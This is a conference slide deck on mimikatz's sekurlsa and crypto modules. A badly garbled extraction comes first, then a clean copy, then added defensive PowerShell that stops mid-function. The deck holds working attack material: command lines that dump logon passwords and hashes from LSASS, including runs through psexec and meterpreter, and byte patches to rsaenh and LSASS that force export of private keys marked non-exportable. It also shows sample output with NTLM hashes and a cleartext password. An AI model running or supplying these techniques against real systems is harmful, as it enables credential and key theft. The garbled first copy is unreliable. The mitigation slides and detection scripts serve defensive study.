- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto / patchcapi: demo time
Import, export, import as not exportable… export
mimikatz crypto / patchcapi: limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz crypto / cng: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz crypto / cng: how it's exported ( level)
[Diagram: the process asks CNG to export a key; the request goes over RPC to the KeyIso service (LSASS process), which does the DPAPI decode and loads the private key ("PLAYSKOOL"). Exportable? yes: Exported Key; no: NTE_NOT_SUPPORTED. On NT6, LSASS is a system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP.]
mimikatz crypto / patchcng: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks whether the key is exportable.

mimikatz # crypto::exportKeys
[user] Clés CNG
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité : NON
    Taille clé    : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
    mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
Exportable
mimikatz crypto / patchcng: because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz crypto / patchcng: demo time
Import, export, import as not exportable… export again
mimikatz crypto / patchcng: limitations
Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz crypto / patchcng: bonus
After one admin patched LSASS, all users of the current system benefit from extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
– Yeah, like the good old certutil

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz crypto: memo
Some commands:
mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
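A defender-side counterpart to the two facts in that memo (exportable flags are checked by the provider, and deleted or re-imported certificates leave key files behind), written as an added example that is not from the slides or from mimikatz: it lists the private keys behind one store's certificates, which API and provider hold each one and whether it is marked exportable, then looks for key files on disk that no certificate in that store references any more. It assumes Windows PowerShell 5.1 on .NET Framework, where GetRSAPrivateKey returns RSACryptoServiceProvider for CAPI keys and RSACng for CNG keys, and the standard key directories under APPDATA and ProgramData.

```powershell
# Added example, not from the slides: audit the private keys behind the certificates
# of one store. Assumes Windows PowerShell 5.1 / .NET Framework, where
# GetRSAPrivateKey() returns RSACryptoServiceProvider (CAPI) or RSACng (CNG).
param([string]$StorePath = 'Cert:\CurrentUser\My')

Add-Type -AssemblyName System.Security

function Get-PrivateKeyInfo {
    param([System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)
    if (-not $Cert.HasPrivateKey) { return $null }
    $info = [ordered]@{
        Subject    = $Cert.Subject
        Thumbprint = $Cert.Thumbprint
        Api        = 'unknown'
        Provider   = $null
        Container  = $null
        UniqueName = $null   # file name of the key blob on disk
        Exportable = $null
    }
    try {
        $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Cert)
    } catch {
        # key file missing or not readable by this user: still report the certificate
        $info.Api = "error: $($_.Exception.Message)"
        return [pscustomobject]$info
    }
    if ($rsa -is [System.Security.Cryptography.RSACng]) {
        # CNG: the export policy is enforced by the KSP inside LSASS (keyiso)
        $info.Api        = 'CNG'
        $info.Provider   = $rsa.Key.Provider.Provider
        $info.Container  = $rsa.Key.KeyName
        $info.UniqueName = $rsa.Key.UniqueName
        $info.Exportable = $rsa.Key.ExportPolicy.HasFlag([System.Security.Cryptography.CngExportPolicies]::AllowExport)
    } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
        # CAPI: the exportable flag is checked by the CSP (rsaenh.dll) in the caller's own process
        $csp = $rsa.CspKeyContainerInfo
        $info.Api        = 'CAPI'
        $info.Provider   = $csp.ProviderName
        $info.Container  = $csp.KeyContainerName
        $info.UniqueName = $csp.UniqueKeyContainerName
        $info.Exportable = $csp.Exportable
    }
    [pscustomobject]$info
}

function Get-KeyFileDirs {
    # Standard on-disk locations of CAPI (RSA\) and CNG (Keys\) key blobs
    param([string]$StorePath)
    if ($StorePath -like 'Cert:\LocalMachine*') {
        @("$env:ProgramData\Microsoft\Crypto\RSA\MachineKeys", "$env:ProgramData\Microsoft\Crypto\Keys")
    } else {
        @("$env:APPDATA\Microsoft\Crypto\RSA", "$env:APPDATA\Microsoft\Crypto\Keys")
    }
}

$keys = @(Get-ChildItem -Path $StorePath | ForEach-Object { Get-PrivateKeyInfo -Cert $_ } | Where-Object { $_ })

Write-Host "== Private keys behind certificates in $StorePath =="
$keys | Format-Table Subject, Api, Provider, Exportable, UniqueName -AutoSize | Out-Host

Write-Host "== Keys marked exportable (any code running as this user can export them through the normal API) =="
$keys | Where-Object Exportable | Format-Table Subject, Api, Container -AutoSize | Out-Host

# Key files that no certificate in this store references: leftovers from deleted
# certificates or repeated imports. Candidates only: a file may belong to a
# certificate in another store or to a system component, so verify before deleting.
$referenced = @($keys | ForEach-Object { $_.UniqueName } | Where-Object { $_ })
Write-Host "== Key files on disk not referenced by any certificate in $StorePath =="
foreach ($dir in Get-KeyFileDirs -StorePath $StorePath) {
    if (-not (Test-Path -LiteralPath $dir)) { continue }
    Get-ChildItem -LiteralPath $dir -File -Recurse -Force |
        Where-Object { $referenced -notcontains $_.Name } |
        Select-Object FullName, Length, LastWriteTime |
        Format-Table -AutoSize | Out-Host
}
```

Run it once per store that can hold private keys (at least CurrentUser\My and LocalMachine\My) before treating a file as orphaned; MachineKeys in particular also holds keys used by system components with no certificate at all.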
mimikatz crypto: what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts / computer
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz: that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) in the LSASS process to take advantage of its keys when we called it.
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" LSASS initialized keys
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
[Diagram: LsaUnprotectMemory]
mimikatz sekurlsa: LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses
– RC4
– DESx
[Diagram: in lsass, lsasrv holds g_pRandomKey (BYTE[g_cbRandomKey]), g_cbRandomKey (DWORD, 256), g_pDESXKey (BYTE[144]) and g_Feedback (BYTE[8]); mimikatz copies… them into its own loaded lsasrv.]
mimikatz sekurlsa: LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses
– 3DES
– AES
[Diagram: in lsass, lsasrv holds InitializationVector (BYTE[16]), h3DesKey and hAesKey; mimikatz copies… them into its own loaded lsasrv.]
typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE  data;
    /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz sekurlsa: memo
Security Packages
Package         Symbols                                   Type
tspkg           tspkg!TSGlobalCredTable                   RTL_AVL_TABLE
wdigest         wdigest!l_LogSessList                     LIST_ENTRY
livessp         livessp!LiveGlobalLogonSessionList        LIST_ENTRY
kerberos (nt5)  kerberos!KerbLogonSessionList             LIST_ENTRY
kerberos (nt6)  kerberos!KerbGlobalLogonSessionTable      RTL_AVL_TABLE
msv1_0          lsasrv!LogonSessionList                   LIST_ENTRY
                lsasrv!LogonSessionListCount              ULONG
Protection Keys
Key     NT 5 Symbols                                NT 6 Symbols
        -                                           lsasrv!InitializationVector
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey   -
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback        -
3DES    -                                           lsasrv!h3DesKey
AES     -                                           lsasrv!hAesKey
mimikatz sekurlsa: memo
Some commands:
mimikatz "privilege::debug" "sekurlsa::logonPasswords full" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC) Traitement du Kiwi (Aug 2 2012 01:32:28) http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
    msv1_0 :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
     * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
    kerberos :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    wdigest :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    tspkg :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    livessp : nt (LUID KO)
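Every step in this deck that touches LSASS (privilege::debug, reading its memory for sekurlsa, the one-byte crypto::patchcng write, the sekurlsa.dll injection) leaves a trace a defender can key on. The following is an added example, not from the slides: two checks run over a constructed set of records in the shape of Sysmon Event 10 (ProcessAccess) and Security Event 4703 (a user right was adjusted; Windows 10 / Server 2016 and later). The allow list and the sample records are made up for the demonstration; live input would come from Get-WinEvent.

```powershell
# Added example, not from the slides: flag SeDebugPrivilege being enabled and
# handles to lsass.exe that carry memory-read/write or thread-creation rights.
# Input records are constructed here; live ones would come from Get-WinEvent.

# Process access rights from winnt.h
$PROCESS_CREATE_THREAD = 0x0002
$PROCESS_VM_READ       = 0x0010
$PROCESS_VM_WRITE      = 0x0020

# Processes expected to open LSASS with memory rights on a healthy host
# (constructed list: tune it per environment, e.g. add your AV/EDR engine)
$AllowedLsassReaders = @(
    'C:\Windows\System32\csrss.exe',
    'C:\Windows\System32\wininit.exe',
    'C:\Program Files\Windows Defender\MsMpEng.exe'
)

function Test-LsassAccess {
    # Sysmon Event 10 (ProcessAccess): SourceImage, TargetImage, GrantedAccess
    param([pscustomobject]$Event)
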